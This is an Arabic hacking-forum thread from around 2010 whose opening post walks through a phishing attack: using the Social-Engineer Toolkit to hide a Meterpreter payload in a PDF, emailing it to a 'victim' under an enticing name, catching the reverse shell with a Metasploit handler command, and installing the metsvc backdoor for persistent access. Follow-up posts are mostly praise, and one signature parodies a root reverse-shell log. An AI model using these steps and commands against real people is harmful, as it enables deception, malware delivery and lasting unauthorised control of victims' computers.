التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Penteration Testing Training
تحديث الصفحة Hack with Social Engineering
التعليمات التقويم مشاركات اليوم البحث

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-15-2010, 01:16 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 
 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road
.................... Hack with Social Engineering

السلام عليكم ورحمة الله وبركاته
بـسم الله الرحمن الرحيم

الموضوع اهداء لكل اعضاء VbSpiDerS و منقول من Dr.Linux للفائدة

اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميت***

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية

ماهي الادوات اللازمة للقيام بالعملية ؟


1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
ملاحظة : يجب ان تكون root ..

صورة للتوضيح بعد تطبيق الامر و تكوين المجلد :


الان ندخل على مجلد الاداة بالامر :
كود:
cd SET
من ثم نشغل الادة عن طريق الامر :
كود:
./set
و هذي صورة توضيحية للامرين ..

اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :

مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم

الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter

بعد تحديد البايلود .. الان بيطلب منك الاي بي تبعك للاتصال بالضحية و بيطلب منك البورت اللي راح يتم التنصت عليه نحددها و نكمل شغلنا ..

الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..

الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6

بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..



بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟

حلوو .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :
كود:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E
الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !

================================================== =======================

اضافة بسيطة و مفيدة جدا

و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

حلوو ..

بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

الامر :
كود:
run metsvc

الان بعد تنصيب الخدمة و في حال خروج الضحية ..

تقدر ترجع للضحية بالامر التالي :
كود:
./msfcli exploit/multi/handler PAYLOAD=windows/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E
بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

نلاحظ الصورة


سلاام


Hack with Social Engineering

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

التعديل الأخير تم بواسطة Cyber Code ; 07-19-2010 الساعة 07:04 AM.

   

قديم 02-15-2010, 03:34 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 
 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road
افتراضي

good bro keep up

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

قديم 02-16-2010, 05:13 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 
 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road
افتراضي

منور الموضوع يالغالي , بارك الله فيك
ومشكور على التثبيت

التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

قديم 04-02-2010, 12:28 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
El3ctr0-Dz
.:IronMind:.
 
الصورة الرمزية El3ctr0-Dz
 

 
 
إحصائية العضو








El3ctr0-Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى El3ctr0-Dz إرسال رسالة عبر Skype إلى El3ctr0-Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
El3ctr0-Dz is on a distinguished road
افتراضي

شكرا لك حبييبي دارك
بارك الهل فيك على الموضوع الجميل
و لااحد يستطيع قهر الهندسة الاجتماعية

التوقيع

======================================
[+] Human Error Detected : Auto payload in progress
[+] Generating payload
[+] Sending evil packet
[+] Reverse shell initiated from 68.82.4.9
[+] id=0(root) gid=0(root) groups=0(root)
======================================
P4L 4 Ev3r

qib@hotmail.com

 

   

قديم 07-27-2010, 09:51 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 
 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road
افتراضي

موضوع شيق ورائع

الف شكر لك بس لوكان شرح فيدو راح يكون اكثر متعة

الف شكر لك اخي دارك

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة

http://www.vbspiders.com/vb/t71973.html

 

   

قديم 01-01-2011, 02:51 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 
 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road
افتراضي

ياسلام شرح جممممممميل جدأأ بارك الله فيك ياغالي واصصل ابداعكـ.




تحياتي لكـ.

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

قديم 02-04-2011, 11:11 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية head-shot
 

 
 
إحصائية العضو





head-shot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
head-shot is on a distinguished road
افتراضي

good job bro big up :D

   

قديم 09-08-2011, 09:59 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية سجين الوطن
 

 
 
إحصائية العضو





سجين الوطن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
سجين الوطن is on a distinguished road
افتراضي رد: Hack with Social Engineering

مشكور اخوي

   

قديم 09-29-2011, 12:46 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية kimcam
 

 
 
إحصائية العضو





kimcam غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kimcam is on a distinguished road
افتراضي رد: Hack with Social Engineering

بارك الله فيك أخي

   

قديم 09-14-2012, 11:40 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية Stone Love
 

 
 
إحصائية العضو







Stone Love غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Stone Love is on a distinguished road
افتراضي رد: Hack with Social Engineering

Go Ahead

التوقيع

Stone Love ...... came back for more

Kala$nikoV Team I miss you

Best Friends ever :

Doom ps
Volcano
Flash

 

   

موضوع مغلق

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
the engineering inversive أسدالله الدمشقي قســم إختــراق الأجهــزة 0 07-21-2010 11:59 AM
reverse-engineering-code-with-ida-pro marrak قســم إختــراق الأجهــزة 1 07-24-2009 06:10 PM
[Template] : ما راح تصدقوووا Facebook Template for Social Engine 3.14, From social-engine-template xman2 قســم تطويــر المــــواقع 0 05-21-2009 02:46 AM


الساعة الآن 02:07 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0